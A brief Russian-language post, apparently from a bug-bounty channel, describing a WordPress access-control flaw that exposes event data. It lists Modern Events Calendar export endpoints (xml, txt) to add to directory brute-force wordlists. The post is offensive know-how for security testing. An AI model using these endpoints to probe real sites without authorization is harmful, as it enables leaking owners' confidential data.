​​📂 Ошибки контроля доступа на Wordpress



Неправильный контроль доступа может нести высокую опасность (P2), что позволит злоумышленнику читать конфиденциальную информацию, выбирая нужный формат, например: (xml, txt, json ...)



Добавьте данные конечные точки в свой список для перебора директорий:



/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml



/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=txt



и т.д.



#web #wp #leak